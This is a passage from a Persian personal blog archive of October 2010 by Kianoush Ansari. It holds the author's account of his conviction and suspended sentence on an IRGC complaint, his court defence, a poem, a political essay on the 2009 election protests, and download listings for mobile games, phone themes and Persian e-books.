ایشان همچنین با قدردانی از زحمات شورای هماهنگی تبلیغات اسلامی، این نهاد را یكی از كهن ترین و پرسابقه ترین نهادهای جمهوری اسلامی دانستند و افزودند: شورای هماهنگی تبلیغات اسلامی براساس یك نیاز واقعی و صادقانه شكل گرفت و این نهاد در طول سی سال گذشته نیز همواره براساس شناخت لحظه و نیاز عمل كرده است.

رهبر انقلاب اسلامی، حضور آیت الله جنتی در رأس شورای هماهنگی تبلیغات اسلامی و اشراف وی بر كارها را یكی از عوامل اصلی حركت این نهاد در مسیر صحیح و شناخت به موقع نیازها دانستند.

در ابتدای این دیدار آیت الله جنتی رئیس شورای هماهنگی تبلیغات اسلامی ضمن اشاره به سابقه شورا و تشكیل آن در 12 مرداد 59، گزارشی از فعالیتها و عملكرد این نهاد در مقاطع مختلف بویژه در راهپیمایی نهم دی امسال ارائه از عملكرد بسیار خوب صدا و سیما در این رویداد مهم قدردانی كرد.

کیانوش انصاری بازدید : 129 دوشنبه 26 مهر 1389 نظرات (0)

به نام او که هم یاد است و هم یادگار

 

شاکی: فرماندهی سپاه پاسداران درگز

متهم: کیانوش انصاری

اتهام: تشویش اذهان عمومی دائر بر نشر اکاذیب

 

بلاخره حکم دادگاه بنده هم صادر شد

چند ماه پیش سپاه پاسداران انقلاب اسلامی شهرستان درگز از بنده با ادعای نشر اکاذیب و تشویش اذهان عمومی شکایت کرده بودند که بعد از چند جلسه دادگاه و... بلاخره حکم دادگاه صادر شد. دادگاه با این رای در تاریخ 22/10/88 اتهامات منتسب به بنده رو محرز و مسلم دونسته و حکم فرمودند که بنده به خاطر گفتن چند جمله ی انتقادی خطاب به سپاه پاسداران مستحق 91 روز زندان هستم که البته حکم رو تعزیری فرمودند. و ضمنن آخر حکم اومده که با توجه به نداشتن سوء سابقه و تحقیق و... در مورد احوالات اینجانب مناسب دونستند الحمدالله که این حکم به مدت دو سال تعلیق باشه تا اگر در این دو سال بنده دست از پا خطا کرده و جرمی مرتکب شدم (چه خطایی؟ چه جرمی؟) مثلن اگر دوباره از فرماندهان محترم سپاه پاسداران عزیز به خاطر ورود به عرصه ی سیاست و نا دیده گرفتن فرمایشات امام (ره) انتقاد کردم و یا جرم هایی از این قبیل رو انجام دادم این حکم عادلانه و شریف الغا و بنده 91 روز به دانشگاه انسان سازی آقایان تشریف ببرم.

در جلسه ی دادسرای عمومی و انقلاب خطاب به نماینده محترم دادستان قاضی کیمیایی گفتم که بنده کجای صحبت هام و اعمالم کذب بوده و در راستای تشویش اذهان عمومی؟!!!

فرمودند: "شما انتقاد کردید که نهاد عزیزی مثل سپاه چرا باید در لیست سازمان های تروریستی قرار بگیرد؟ آقای انصاری ما افتخار می کنیم که سپاه در لیست سازما های تروریستی قرار گرفته؛ چون کار کار استیکبار جهانیست ..."

گفتم: خوب شما و همفکراتون افتخار می کنید اما من و شاید امثال بنده افتخار ندونیم و انقاد داشته باشیم آیا قانون به شهروندان این سرزمین اینچنین اجازه ای نداده که در چهارچوب نظم از هر آنچه که فکر می کنند واسه سرزمینشون مضر گله و انتقاد بکنند و هر چه رو که مفید می دونند تایید بکنند؟

فرمودند: صحبت های شما در سخنرانی فلان تاریخ مورد پسند بیگانگان است و...

خلاصه پرونده ی ما از دادسرا رفت دادگاه محترم

در دادگاه قاضی یعقوبی خندان تر از برادر عزیزمان جناب کیمیایی به نظر می رسیدند.

اما در انتها همان شد که در داسرا شد و رای عدالت محور دادگاه اسلامی اینچنین شد که بنده با حکمی معلق تا دو سال به نود و یک روز زندان محکوم شده و باید از این به بعد حواسمو بیشتر جمع کنم که مبادا انتقادی بکنم که بیگانه خوشحال بشه و... تا سر سبزم ندهم بر باد.

ضمنن جهت اطلاع دوستان و آشنایان و خوانندگان و مخاطبان مطلع و بی اطلاع و... متن دفاعیات خودم رو هم اینجا قرار میدم.

 

به نام خداوند جان آفرین                    حکیم سخن در زبان آفرین

روایت است که پیامبر اسلام (ص) در زمان فوت خود خطاب به امتش فرمودند که من دو یادگار نزد شما به امانت می گذارم یکی قرآن بود و دیگری اهل بیت و فرزندان او. اولین امانت وی کتابیست که چهارچوب های نظری اندیشه وی در آن نهفته است و دومین امانت او نزد امتش فرزندان و اهل خانه اش است که تاریخ از آنها به عنوان افرادی صالح و بسیار محترم یاد می کند که البته قدرت طلبان زمان چه حتک حرمت ها که در حق ایشان نکردند.

بنده بر این گمانم که این وصیت پیامبر ما حرف و وصیت تمامی مردان و رهبران بزرگ دنیا که ملتی را در پیروی خود دارند می تواند باشد. امام خمینی (ره) مردی بود که از سال های آغازین جوانیش تا انتهای عمرش برای اسلام و ملت مسلمان ایران مبارزه کرد. مبارزه کرد که ملت ایران آزاد باشند و سرزمینشان را اداره کنند و سرنوشتشان را آنگونه رقم بزنند که صلاح خود می دانند و خود خسروان خود باشند و آقای خود. در این راه مردان و زنان آزاده ی زیادی هم ره امام شدند و در کوچه پس کوچه های این مرز و بوم جان دادند و شهید شدند بی شک آنان نیز مانند امامشان می خواستند سرزمینی داشته باشند که در آن عدالت حکم کند و رضایت خدا و خلقش برقرار باشد. در نظر بنده این راه امام و شهیدانی بود که امروز این سرزمین را مدیون به آنها می دانم و این امانتیست که آن روح بزرگ بعد از وفاتش برای ملتش و نسل های آینده به یادگار گذاشت. و در کل بنده اندیشه ی امام و بیت محترمشان را دو یادگار بزرگ از رهبر کبیر انقلاب می دانم.

بنده کیانوش انصاریهم جوانی هستم که همانطور که باید، نسبت به مسائل کشورم حساسم و معتقدم که تکلیف همه این نسل است که در شرایط حاضر آگاهانه به مسائل روز کشورشان اهمیت بدهند و راه نزدیکی سعادت و تعالی بیشتر برای مردم این سرزمین را ادامه راه آزادی خواهانه و عدالت طلبانه امام و شهیدان انقلاب می دانم. و همیشه رفتار خود را در حوزه ی سیاسی و اجتماعی بر این کوشش استوار کردم که رضای خدا و خلق او برایم اولیت باشد و الگوی خود را مردمانی یافتم که در اجرای تکلیف دینی و وظایف انسانیشان بی هیچ هراسی از هیچ قدرت استکباری راهی را رفتند که حاصلش را رضایت خداوند و بنده گان خدا دیدند.که اگر هم نسلان من، خمینی و آرمانهایش و ره دشوار شهیدان و مبارزان راه حق در این انقلاب را مطالعه ای بیشتر و عمیق تر داشته باشند و به اندیشه و عشق و آمال و آرزوهای آنها برای نسل آینده ی سرزمینشان و راه سخت و دشوار و زجرهایی را که در این مبارزه طی کردند تا سرزمینی آزاد بسازند را مطلع باشیم، بی شک باید عشقی وصف ناشدنی به آن مردان و زنان انقلابی و خدایی در دل این نسل موج بزند و راه آنها را آگاهانه و صادقانه و عاشقانه ادامه دهند.

امام بعد از استقرار نظام جمهوری اسلامی همواره توصیه ها و نصیحت ها و وصیت های خود را برای حفظ انقلاب آزادیخواهانه ی ملت ایران داشتند و بر عملکرد به آنها تاکید فراوان کردند. تا بعد از فوت ایشان نسل پیرو آن فضای نورانی بر حفظ آن دستاورد ها که حاصل تحمل دشواری های فروانی بود کوشا باشد و نکند که خدای ناکرده مصلحت اندیشی عده ای کرامت انسانها را در این سرزمین تضعیف بکند.

بنده همانطور که قاضی محترم فرمودند در پیش سخنرانی که در ایام تبلیغات انتخاباتی در تاریخ               در ستاد مهندس موسوی نخست وزیر سرفراز و آزاده ی امام و هشت سال دفاع مقدس؛ به دخالت بسیج در سیاست اعتراض کرده ام و در بندی دیگر از صحبت هایم از نادیده گرفتن فرمایشات امام خمینی توسط سپاه محترم پاسداران، گله کردم و آن را مورد انتقاد قرار دادم که مورد شکفه ی سپاه پاسداران قرار گرفته که موظفم در مقام دفاع خدمت قاضی محترم توضیحاتی ارائه بکنم:

طبق وصیت نامه ی امام؛ امام خمینی به شدت تاکید و تایید فرمودند که دخالت نظامیان در سیاست همانطور که قانون است انجام نشود و خطاب به نظامیان خواسته اند که به این موضوع توجه کنند و طبق قانون در سیاست دخالت نکنند.

آیا برادران عزیز بسیجی منکر این وصیت نامه امام و حتی دیگر فرمایشات ایشان در سخنرانی های با همین مبنا که اسناد آن موجود است می باشند؟

آیا برادران بسیجی منکر این موضوع هستند که از یک کاندیدای خاص وابسته به یک جریان سیاسی خاص قوین حمایت کرده و بر خلاف وصیت نامه امام و فرمایشاتشان فعالانه وارد ساز و کار سیاسی و انتخاباتی شده اند؟ که اسناد آن هم موجود است که البته قاضی محترم حتمن در نمازهای جمعه شرکت می کنند و آن سخنرانی معروف فرماندهی محترم سپاه پاسداران درگز را به خاطر دارند و چگونه تحلیل کردن فرمایشات رهبری و نظرات ایشان در مورد مسائل سیاسی روز و...

بنده در بندی دیگر از صحبت هایم که مورد اشاره ی شکفایه بوده است گفته ام: ما سپاه را مدافع منافع تمامی ملت می دانستیم؛ فرماندهان محترم سپاه پاسداران انتظار ما از شما به اندازه ی یک سیاست مدار چکمه پوش نیست.

ما سپاه را مدافع منافع تمامی ملت می دانستیم: سپاه پاسداران انقلاب اسلامی اساسنامه ای دارد که هدف از تشکیل این نهاد را بیان می کند که به آشکار در آن منافع تمامی ملت مورد نظر و مورد تایید و تاکید است و از دیر باز رفتار بسیجیان نیز گویای همین مطلب بوده که به عنوان نهادی حکومتی در خدمت آحاد ملت است و برای آبادانی کشور در تلاش است. در هیچ جای اساسنامه نبوده که به عنوان یک سازمان رای می تواند برای یک جناه فعال باشد که اگر اینگونه بود منافع تمامی ملت در هدف آن میسر نمی شد و بنده هدفم گوش زد صادقانه ی این مسئله بوده و دوباره تاکید می کنم که هیچ گاه هدفی در تشویش اذهان عمومی و نشر اکاذیب نداشتم و در هیچ کجای فعالیت بنده نمی توان یافت که حتی سهون هم اتفاقی نمایانگر این موضوع باشد و نمی دانم عزیزان چطور استنباط فرمودند که با این عنوان از بنده شکایت کرده اند.

فرماندهان محترم سپاه پاسداران انتظار ما از شما به اندازه ی یک سیاست مدار چکمه پوش نیست: این هم دیگر گفته ی بنده بوده که مورد شکفه قرار گرفته بنده در طول گفته هایم بار ها از کلماتی مانند این "نهاد عزیز" و یا واژه "محترم" و... بعد از نام مورد خطاب در مورد نظامیان و... استفاده کردم که هدفم تنها این بوده که بر صداقت و دوستی خودم و گفته هایم نسبت به کسانی که مورد انتقاد گفته های من هستند تاکید بکنم. هیچگاه منظوری در توهین به یک شخص یا نهاد یا... نداشتم که شخصن اینگونه حرف زدن و رفتار کردن را نه قبول دارم و نه مورد پسند مردم است و یک شخص که حرفهایی می زند که می خواهد حرفهایش را عده ای از مردم بپذیرند هیچگاه از توهین و حمله ی شدید استفاده نمی کند و بنده هم قصدم این نبوده که با واژه سیاست مدار چکمه پوش به کسی توهینی بکنم. در این واژه هم تنها قصد من انتقاد از دخالت نظامیان در سیاست بود و واژه سیاست مدار چکمه پوش یک کنایه بود به دخالت یک شخص نظامی در حوزه ی ظریف سیاسی اجتماعی. و در ادامه توضیح اینکه حتی اگر نوع بیان بنده باعث سوء تفاهم در برداشت منظور از گفته های اینجانب شده از دوستان عذر خواهی کرده و دوباره تاکید می کنم که قصد از به کار بردن این واژه تنها کنایه در باره ی موضوعی به نام دخالت نظامیان در سیاست بود.

در جایی دیگر از صحبت هایم؛ به قرار گرفتن سپاه پاسداران در لیست سازمان های تروریستی دنیا اشاره کرده و آن را مورد انتقاد قرار داده ام. چراکه این موضوع شاید یکی از ضربات سنگینی بود که به نظام و مملکت ما وارد شد؛ بعد از قرار گرفتن سپاه کشور ایران در لیست سازمان های تروریستی!!! بلافاصله قطع نامه ها و تحریم های نظامی علیه ما ایجاد شد؛ چندین بانک ما تحریم شدند و حتی اگر تمامی موارد فوق را نادیده بگیریم؛ می دانیم که امریکا و غرب خیلی وقت است که مجوز مبارزه با تروریسم را از دنیا گرفته است و قرار گرفتن سپاه ایران در لیست سازمان های تروریستی!!! یعنی گرفتن مجوز جنگ دنیا با ایران.

قرار گرفتن این نهاد در این چنین لیستی مسئله ی کوچکی نبود و  صدمات زیادی را به لحاظ مادی و آبرو؛ به نظام و مردم ما وارد کرد آیا بهتر نبود با دفاع بیشتر از این موضوع جلوگیری بکنیم یا از رابطه خوبی که با روسیه دندان تیز کرده برای منافعش داریم بیشتر استفاده می کردیم؟ و یا اصلن آیا بهتر نبود با صبر بیشتری عمل می کردیم و اینقدر گرفتار افراط و تفریط نمی شدیم که کار به اینجا برسد؟ همین سپاه با همین سیاست های خارجی سی سال است که فعال است اما هیچ وقت در داخل و خارج اینهمه مورد حمله و صدمه نبوده! و صدمه به سپاه همین طور که در مثال بالا گفته شد صدمه به کل مردم و نظام است و این موضوع بود که دغدغه بنده بود و این حرف ها زده شد نه اینکه هدف تشویش اذهان عمومی داشته باشم و یا نشر اکاذیب.

بنده فقط به عنوان یک شهروند از حقوق قانونی خود استفاده کردم و از مسائلی که فکر می کردم به نفع این مملکت نیست حرف زدم و انتقاد کردم؛ تمامی فعالیت ها و صحبت های بنده در چهارچوب قانون بوده و با قبول ارکان نظام مستقر وارد ساز و کار سیاست شدم. و در این مملکت نه انتقاد از هیچ مقامی جرم است و نه فعالیت سیاسی در چهارچوب قانون و نه رای دادن به یک منتقد سیاسی در درون این نظام و نه شرکت فعالانه در جشن انقلاب که همان انتخابات است. بنده واقعن نمی دانم در کجای بند هایی از صحبت های من که مورد اشاره شاکی محترم است تشویش اذهان عمومی نهفته یا کجا بنده حرفی بر خلاف واقع زدم که اتهام نشر کذب به آن بچسبد. بلاخره وقتی سپاه پاسداران مثل یک حزب سیاسی وارد عرصه ی سیاست می شود و از یک جریان سیاسی حمایت می کند باید منتقدین سیاسی خود را هم به رسمیت بشناسد. انتقاد هم  مخصوصن در سیاست در قانون این دیار حق مسلم تمامی شهرواندان است؛ حتی در جایی امام می فرمایند: "در جمهوری اسلامی هر فرد ساده می تواند حتی بالاترین مقام کشور را استیضاح بکند و او موظف است که جواب دهد و قانع کند".

کیانوش انصاری بازدید : 116 دوشنبه 26 مهر 1389 نظرات (0)

...وبرای من لحظه های بی پایان تکرار

وصدای پای گذر زمان در پهنه سیاه وقت کشی

آمدوشد انسان هایی بی هدف به سوی نیستی

و اشک های درختان سبز که آهسته و بی صدا به زمین می ریخت

و آه خزان سر می داد

مرا همراه خود به اعماق موهوم و تاریک وجودم می برد.

وصدای خنده های بی انتهای بی بته ای خیره

این سکوت مردابین را درهم می کشید و آزارم می داد

و خروش ظلم برلاله های تنها

صدای شکستن شیشه های قلبشان را در ذهنم تداعی می کرد

 

و ناله های دلخراش او:

آه...ای مظلوم من...

کاش دلم شب و زبانم خاموش نبود

کاش توان پروازداشتم...

کاش...

 

...و من دراین دالان تیره وتار

 تنهای تنها نشسته ام؛

 برای مرگ غنچه های فراموش شده ام می لرزم و می گریم و

به خاطرات تنهایی گوش می دهم

ناگفته هایش هم برایم آشناست امادراین مرداب سرد،

فقط اوست شکننده این سکوت مرگ!

من دراین دالان سرد،تیره وتار،

نفس هایم را فریاد می زنم:

 

اما کجاست آن زنده ای که گرمای این نفس ها را دریابد!

کیست آنی که برگ های خشکیده ام را سبز کند؟

کجاست آن یاری کننده ای که یاریم کند؟

این سرخ واژگان را اینچنین دم می زدم!

آخ ...ای تنهاترین ، تنهایی من!

ای وجودت مانوس من

ای امیدت ناامیدی من

ای همراه

ای هستی من!

تاکی...

            کجامی رویم؟

تاکدامین روز هم صحبتم چنار، رفیقم تنهایی است؟

دست هایم کوتاه و دراین مرغزار مه آلود با آسمانی کبود و تار

می دوم درپی خوشبختی و نوراما...

چرا تنها؟

اطرافم پر شده از خارهای چندرنگ!

وآن دور

          دست های خونین سیاه رنگ!

باآن سراب دروغین...پس کجایند تشنگان راه ما؟

                                             کجایند عاشقان بی غبار!

کجاست دهکده های سبز  ِ سبز؟

 

شاید هیچگاه!

 هیچ کس! و شاید هیچ کجا!

کم اند مردان خدا! 

                          یک نفر؟

 شاید هیچ!

             کجاست آن رهرو راه خداا؟...

کجاست؟

کیانوش انصاری بازدید : 146 دوشنبه 26 مهر 1389 نظرات (0)
مجموعه کامل از 7 نسخه از بازي زيبا و جذاب Worms . تمام اين نسخه ها جاوا ميباشند و با گوشي هاي سوني اريکسون و نوکيا با رزولوشن 176x220 و 240x320 سازگار ميباشند .


 

تم گوشی



 

دانلود




 






 

مجموعه کامل از تم هاي زيبا براي گوشي هاي سوني اريکسون . اين مجموعه شامل 22 تم زيبا و با موضوعات مختلف براي گوشي هاي سوني اريکسون با رزولوشن 240x320 پيکسل ميباشد . به دليل درخواست کابران مبني بر پرحجم بودن فايل ها , اين مجموعه را در 2 قسمت براي دانلود قرار گرفته است !


 

تم گوشی



 

تم گوشی




 






 

مجموعه کامل از پس زمينه هاي زيبا براي موبايل . اين مجموعه شامل 50 پس زمينه با کيفيت عالي و حجم مناسب و سايز 240x320 پيکسل ميباشد .


 

تم گوشی



 

تم گوشی




 






 

يکي از بازي هاي معروف و پرطرفدار چه در سيستم هاي کامپيوتري و چه در گوشي هاي موبايل بازي Sims ميباشد . اين بار ما نيز آخرين نسخه از اين بازي که Sims2 ميباشد را آمده کرده ايم . اين بازي جاوا بوده و با رزولوشن 240x320 و 352x416 سازگار ميباشد !


 

تم گوشی



 

تم گوشی




 






 

هنوز هم يکي از قدرتمندترين و پرطرفدار ترين آنتي ويروس دنيا کاسپر اسکاي ميباشد . اين آنتي ويروس چه در سيستم هاي کامپيوتري و چه در گوشي هاي موبايل اکثر کاربران حرفه اي نصب ميباشد . اين بار نيز ما اين آنتي ويروس را براي سيستم عامل ويندوز موبايل (پاکت پي سي) آماده کرده ايم . اين آنتي ويروس با گوشي هاي پاکت پي سي : 2000/2002/2003 و با سيستم عامل Palm نيز سازگار ميباشد .


 

تم گوشی



 

تم گوشی




 






 

يکي از بازي هاي جذاب که در کامپيوتر و موبايل رايج شده بازي Counter Strike ميباشد . اين دفعه اين بازي پر طرفدار رو براي گوشي هاي پاکت پي سي آماده کرده ايم . اين بازي با ويندوز موبايل 2002 و 2003 و ويندوز موبايل 5 سازگار ميباشد .


 

موبایل ghalamyaz.blogfa.com



 

موبایل ghalamyaz.blogfa.com




 






 

اين بار هم يکي ديگر از نسخه هاي بازي معروف Gravity Defied بازي هيجان انگيز موتور سواري رو در سايت قرار داديم . اين نسخه که Blackfan Edition نام دارد به صورت جاوا بر روي کليه گوشي هاي نوکيا و سوني اريکسون کار ميکند . اين نسخه داراي سرعت بالاتر مراحل بهتر و کيفيت و گرافيک بالاتري برخوردار است . اميدوارم از اين بازي لذت ببريد .


 

موبایل ghalamyaz.blogfa.com



 

موبایل ghalamyaz.blogfa.com




 






 

يکي ديگر از بازي هاي جاواي محصول سال 2008 شرکت Gameloft بازي Diamond Twister ميباشد . اين بازي جاوا داراي گرافيک عالي و مراحل متنوعي ميباشد . اين بازي مانند يک پازل عمل ميکند و شما بايد مهره هاي همرنگ رو کنار هم بچينيد . اين بازي براي رزولوشن هاي 176x220 و 240x320 پيکسل ساخته شده و با تمام گوشي هايي که جاوا پشتيباني مکنند سازگار است .


 

موبایل ghalamyaz.blogfa.com



 

موبایل ghalamyaz.blogfa.com




 






 

مجموعه کامل از 5 تم جديد سوني اريکسون . اين تم ها براي گوشي هاي سوني اريکسون با رزولوشن 240x320 ميباشند و با گوشي هاي زير سازگارند :
K770i/K790i/K800i/K810i/W830i/W850i/W890i/W900i/T650i/S500i


 

موبایل ghalamyaz.blogfa.com



 

موبایل ghalamyaz.blogfa.com 
کیانوش انصاری بازدید : 132 دوشنبه 26 مهر 1389 نظرات (0)

باسمه تعالی

هزینه ای برای هیچ؟

 

فکر می کنم اوایل تیرماه پارسال(1388) بود... نمایندگان مختلفی از ستادهای انتخاباتی آقای موسوی در شهرستان ها، از طیف های مختلف به خصوص از فرهنگیان و دانشگاهیان را به تهران فراخوانده بودند. برخی آمده بودند و بعضی نه! . شاید دویست نفری در جلسه بودند،‌ تعدادی از ایشان سخنرانی داشتند. بعضی تقلب را جدی و واقعی و برخی آن را نادرست می خواندند. کلیت خبر این جلسه را بعداً برخی سایت ها با عنوان "جلسه موسوی با فرهنگیان"‌منتشر کردند. به خصوص نمایدگان شهرستان های کوچک تاکید داشتند که در شهرستان آنها تقلبی نبوده و البته همگی از تخلفات صورت گرفته در انتخابات شاکی و برخي حتی عصبانی بودند، در کل این جلسه موفق نشد که تقلب و همچنین اعتراض به تقلب در نتیجه ی انتخابات را توجیه بکند اما همگی به اتفاق بر تخلفات گسترده و... تاکید کردند و از آقای موسوی خواستند تا حداقل یک به یک تخلفات را در بیانیه خود اشاره کند و به آنها اعتراض بکند، اما انگار بحث فراتر از تقلب و این حرف ها بود.

در انتها آقای فاتح که مجری این جلسه بود حرف هایی جدا از موضوع جلسه زد. برخی ازجملات در صحبت های ایشان اینگونه بود که ((چه تقلب شده باشد چه نه "ظلم باید برود")) ایشان به اصطلاح به بداخلاقی های دولت و حاکمیت اشاره و همینطور به جمعیت زیادی که در انتخابات در نقاط مختلف کشور سازماندهی کرده بودند اشاره کرد و اینگونه نتیجه گرفت که فرصت خوبیست تا علیه حکومت پیگیر آرمان های خود باشند و در ادامه گفت "معتقدم تاریخ کشورمان اینک دارای فرصت زایش یک اتفاق بزرگ است و دست تقدیر ما را مسئول برقرار نمودن این اتفاق کرده..." در ادامه ایشان اتفاقات آینده را با سال های 1332 و اعتراضات علیه اقتدارگرایی شاه معرفی نموده و گفتند "راه طولانی و بی برگشتی را در پی داریم" بعد از همین جمله مهندس موسوی بلافاصله فرمودند که "البته بستگی دارد مردم بخواهند چقدر هزینه بدهند" که برای حاضرین اینگونه تصور شد صحبت های آقای فاتح صحبت های خود میرحسین است.که بعید هم نبود

حالا نزدیک به یک سال است از انتخابات ریاست جمهوری می گذرد؛ این روز ها دیگر خبری از اعتراضات و تظاهرات های خیابانی نیست، حالا باید سوال کرد چه می خواستیم؟ چه کردیم؟ چه شد؟

در این یک سال تنها چیزی که بدست آمد آلوده شدن ارکان اصلاح طلبی و از بین رفتن آن از ساختار حکومت بود؛ طبیعیست که وقتی یک جناه علیه حکومت آن هم با ادعای دروغ تقلب قد راست کند حاکمیت بر سرکوب آن همت کند. آیا دوستان ما با پخش اعلامیه ها و... حکومت حاضر را کردند شاه و خود شدند انقلابی؟ همین آقایی که مجری این جلسه بود با آن حرف هایی که اشاره شد خود را مادر تاریخ میدید و حکم بر اتفاقات تاریخی میداد و سال 32 می ساخت، اکنون در انگلستان چه می کند؟ آقایی که سند راهبردی می نوشت و تئوری توسعه ی سیاسی و دولت ضعیف و ملت قوی میداد و از مشروطه دم می زد! چرا چون مشروطه خواهان نکرد؟ مشروطه خواهان در زندان ها ناخن های از جا کشیده شده ی خود را می دیدند و فریاد می زدند آزادی! پس چرا آقایان چون بزدلان در زندان های سنا و جکوزی دارشان فرمودند غلط کردیم؟ و سوال امثال بنده اینست که تکلیف مادران سهراب ها و نداها چیست که با ادعا های شما داغدار فرزندان جوانشان شدند؟ اگر ولایت مدارید چرا صحبت های ولایت در نماز جمعه ی بعد از انتخابات اختتامیه ی آشوب های شما نبود؟! اگر نیستید پس چرا می گویید بعد از تایید انتخابات ریاست جمهوری توسط رهبری احمدی نژاد را به رسمیت می شناسید؟

یاد استاد شجریان که با ترانه ها ی زیبایش می گوید:

 

شرمتان باد ای خداوندان قدرت بس کنید

بس کنید از اینهمه ظلم و قساوت بس کنید

ای نگهبانان آزادی ای نگهداران صلح

ای جهان از لطفتان تا قعر دوزخ رهنمون

بس کنید  بس کنید

کیانوش انصاری

کیانوش انصاری بازدید : 140 دوشنبه 26 مهر 1389 نظرات (0)
 

نویسنده: بابک ناصح چافی

دانلود رایگان کتاب بی پرچم

ناشر: babakit@gmail.com

توضیحات:

دانلود رایگان کتاب بی پرچم

 

زبان: فارسی

حجم کتاب: 540 کیلوبایت

تعداد صفحات: 24

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: مهدی محمد بیگی

دانلود رایگان کتاب مجموعه اشعار هرمه ای که در یخبندان مرد...!

ناشر: www.ramyarism.blogfa.com

توضیحات:

دانلود رایگان کتاب مجموعه اشعار هرمه ای که در یخبندان مرد...!

 

زبان: فارسی

حجم کتاب: 205 کیلوبایت

تعداد صفحات: 24

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

 

نویسنده: نادر نادر پور

دانلود رایگان کتاب چشم ها و دستها

ناشر: محمود یونسی

توضیحات:

دانلود رایگان کتاب چشم ها و دستها

 

زبان: فارسی

حجم کتاب: 1.05 مگابایت

تعداد صفحات: 99

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: محمود یونسی

دانلود رایگان کتاب از تو مردن های من

ناشر: آی آر پی دی اف

توضیحات:

دانلود رایگان کتاب از تو مردن های من

 

زبان: فارسی

حجم کتاب: 10.37 مگابایت

تعداد صفحات: 15

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: محمود یونسی

دانلود رایگان کتاب حدیث بی قراری یک مرد

ناشر: آی آر پی دی اف

توضیحات:

دانلود رایگان کتاب حدیث بی قراری یک مرد

 

زبان: فارسی

حجم کتاب: 1.56 مگابایت

تعداد صفحات: 49

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: محمد رضا جاجی

از کوچ ها تا کوچه ها

ناشر: www.zojaji.blogspot.com

توضیحات:

از کوچ ها تا کوچه ها

 

زبان: فارسی

حجم کتاب: 1.86 مگابایت

تعداد صفحات: 186

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

کیانوش انصاری بازدید : 153 دوشنبه 26 مهر 1389 نظرات (0)

نویسنده: صلاح الدین بهرامی

زبانی که از بیان خود عاجز است ...

ناشر: آی آر پی دی اف

توضیحات:

این نوشته مشتمل بر سه قسمت مستقل و در عین حال مرتبط است که کنکاشی است در آغاز. آغازی بر خدا برای انسان و در زبان برای خدا و در خدا برای زبان. در بخش اول آن به بررسی پایه های معرفتی بحث و سخنی در حدود و صغور معرفت انسانی تحت عنوان انسان و هستی هرمنوتیکی می پردازم. در بخش دوم به بررسی محتوای اصلی منتها نه به اندازه کافی پخته بحث با مدخل و خدایی که در این نزدیکی است خواهم پرداخت و از آن پس پایان و تکمله بحث را با سخنی در معنای وجودی و ذهنی بودن خدا یا جدال خارجی و ذهنی بودنش با نام یک کلمه دقیقاً چه می تواند باشد؟! رقم خواهم زد.

 

زبان: فارسی

حجم کتاب: 600 کیلوبایت

تعداد صفحات: 19

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

 

نویسنده: عبدالله ایرانی

انسان عاقل (راهنمای گام به گام تفکر در عقیده)

ناشر: آی آر پی دی اف

توضیحات:

انسان عاقل (راهنمای گام به گام تفکر در عقیده)

 

زبان: فارسی

حجم کتاب: 1.63 مگابایت

تعداد صفحات: 130

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

 


نویسنده: محسن متقی

روشنفکران اصلاح طلب دینی و مسئله جامعه مدنی

ناشر: آی آر پی دی اف

توضیحات:

روشنفکران اصلاح طلب دینی و مسئله جامعه مدنی

 

زبان: فارسی

حجم کتاب: 314 کیلوبایت

تعداد صفحات: 22

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: محمدجواد غلامرضا کاشی

بحران در روشنفکری دینی

ناشر: آی آر پی دی اف

توضیحات:

بحران در روشنفکری دینی
محمدجواد غلامرضا کاشی در گفت وگویی با علی اصغر سیدآبادی

 

زبان: فارسی

حجم کتاب: 218 کیلوبایت

تعداد صفحات: 22

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

 


نویسنده: مایکل ایچ لسناف

فیلسوفان سیاسی قرن بیستم

ناشر: نشر ماهی

توضیحات:

فیلسوفان سیاسی قرن بیستم نوشته مایکل ایچ لسناف

 

زبان: فارسی

حجم کتاب: 3.30 مگابایت

تعداد صفحات: 274

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

 


نویسنده: علی صفایی حائری

نقدی بر فلسفه دین، خدا در فلسفه، هرمنوتیک کتاب و سنت

ناشر: آی آر پی دی اف

توضیحات:

